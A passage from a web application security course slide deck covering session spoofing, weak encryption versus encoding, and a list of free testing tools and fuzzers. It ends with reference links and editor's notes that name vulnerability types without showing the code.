    - Common Access Control Flaws
    - Common Encryption Flaws
    - Tools
    - Conclusion And Appendices
  • 29. Session Hijacking – Spoofing
    - Spoofing
      - Pretending to be someone else, an attacker attempts to gain the victim's privileges
      - Comes in three basic forms
        - Blind (write-only)
        - Half pipe (read-only)
        - Full pipe
      - Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)
  • 31. Case Study 2
    Session Hijacking
    Spoofing
  • 32. Weak Encryption | Using Encoding
    - Weak/Home-Grown Encryption
      - The use of weak and home-grown encryption has led to the compromise of many systems
      - It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket brigade and substitution attacks, so trivial
    - Encoding
      - The use of algorithms that take output and simply change the format (normally it is the number of bits used per character)
      - This is not secure by any means
  • 33. Case Study 3
    Weak Encryption | Encoding
    XOR
    SHA
    Base64
  • 34. Agenda
    - Course Introduction
    - Common Input Validation Flaws
    - Common Access Control Flaws
    - Common Encryption Flaws
    - Tools
    - Conclusion and Appendices
  • 35. Security Compass
    - XSS-Me
      - A free Firefox plug-in
      - Performs semi-automated XSS attacks against POST fields
    - SQL Inject-Me
      - A free Firefox plug-in
      - Performs semi-automated SQL injection attacks against POST fields
    - Access-Me
      - A free Firefox plug-in…
  • 36. Other Firefox Add-ons
    - Web Developer Add-on
      - Free
      - Lets you view source files cleanly and easily
      - Lets you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh)
      - Lets you view and modify form fields and cookie data
    - Tamper Data
      - Free
      - Lets you modify most request data
  • 37. Fuzzers
    - BED.pl
      - Free Perl script
      - Performs basic tests of your SERVER
    - JBroFuzz
      - Free Java application
      - Lets you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion
    - Powerfuzzer
      - Free and commercial versions (Python script)
      - Easy and multi-talented… automated
  • 38. Other Tools
    - Sothink SWF Decompiler
      - Decompiles any Adobe Flash or Flux script
    - Cavaj
      - Free
      - Decompiles any Java program
    - Nikto
      - Free
      - Provides scans of the website looking for common, basic vulnerabilities and misconfigurations
  • 39. Agenda
    - Course Introduction
    - Common Input Validation Flaws
    - Common Access Control Flaws
    - Common Encryption Flaws
    - Tools
    - Conclusion And Appendices
  • 40. For More Information
    - Microsoft Security Site (all audiences): http://www.microsoft.com/security
    - MSDN Security Site (developers): http://msdn.microsoft.com/security
    - TechNet Security Site (IT professionals): http://www.microsoft.com/technet/security
    - SANS Top-20 (IT Professionals): http://www.sans.org/top20/
  • 41. For More Information (cont.)
    - Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers): http://cwe.mitre.org/top25/index.html
    - GRC IT Security Office: http://itsecurity.grc.nasa.gov
    - Most Common Software Errors: http://discussweb.com/software-testing/803-most-common-software-errors.html
  • 42. Acknowledgements
    - I stole the background from Microsoft
    - I stole a lot from my experiences and previous writings

Editor's Notes

  • #10: The above code illustrates a SQL injection vulnerability
  • #15: The code here is vulnerable to XSS
  • #19: The code here is vulnerable to remote include in two locations
  • #20: The code here is vulnerable to a remote include
  • #28: The code here is vulnerable to directory traversal